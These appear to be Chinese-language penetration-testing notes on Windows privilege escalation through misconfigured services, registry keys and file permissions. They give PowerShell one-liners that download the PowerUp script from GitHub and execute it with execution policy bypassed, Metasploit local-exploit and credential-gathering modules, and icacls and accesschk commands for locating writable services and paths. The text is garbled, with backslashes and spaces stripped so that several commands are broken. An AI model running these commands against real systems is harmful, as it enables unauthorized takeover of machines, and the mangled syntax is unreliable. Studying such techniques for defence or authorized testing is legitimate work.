内网攻防-权限提升-Windows-系统配置错误提权

# 本地加载,检测可利用提权方式import-Module .PowerUp.ps1Invoke-AllCheckspowershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1;InvokeAllChecks}"# 远程加载,检测可利用提权方式powershell -nop -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"# 使用检测到的提权脚本进行提权powershell -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); <利用语句>"

# 检测高权限服务替换exploit/windows/local/service_permissions# 检测高权限服务路径exploit/windows/local/unquoted_service_pathset AutoRunScript migrate -f# 检测注册表键 AlwaysInstallElevated 提权exploit/windows/local/always_install_elevated# 检测自动安装配置文件post/windows/gather/enum_unattend

在 Windows 系统中，可以通过 icacls 命令查看特定目录的权限情况
icacls 命令/T：显示指定目录下的所有子目录/Q：禁止显示成功的消息/L：指定目录为快捷方式/C：显示错误消息并继续执行
icacls 继承(OI)：对象继承(CI)：容器继承(IO)：仅继承(NP)：不传播继承(I)：从父容器继承的权限
icacls 简单权限N：无访问权限 F：完全访问权限M：修改权限RX：读取和执行权限R：只读权限W：只写权限D：删除权限
icacls 特定权限DE：删除RC：读取控制 WDAC：写入 DACWO：写入所有者S：同步AS：访问系统安全性MA：允许的最大值GR：一般性读取GW：一般性写入GE：一般性执行GA：全为一般性RD：读取数据/列出目录WD：写入数据/添加文件AD：附加数据/添加子目录REA：读取扩展属性WEA：写入扩展属性X：执行/遍历DC：删除子项RA：读取属性WA：写入属性

icacls F:test

https://learn.microsoft.com/zh-cn/sysinternals/downloads/accesschk 

-c：指定 Windows 服务，可以使用通配符 * 显示所有服务-k：指定注册表项-h：指定共享文件，可以使用通配符 * 显示所有共享-p：指定进程名和 PID，可以使用通配符 * 显示所有进程-f：当 -p 存在时，显示令牌详细信息-e：显示 Vista 上具有显式完整性级别的所有文件-d：显示顶级目录-s：显示递归目录-n：显示没有访问权限的文件-r：显示具有读取权限的文件-w：显示具有写入权限的文件-u：不显示错误-v：显示详细信息

# 显示特定目录的权限情况accesschk -dv "F:test"# 显示 test 用户对特定目录的权限情况accesschk "test" -dv "F:test"# 显示具有写入权限的服务accesschk -cw *# 显示具有写入权限的进程accesschk -pw *# 查看特定注册表的权限情况accesschk -k hklmsoftware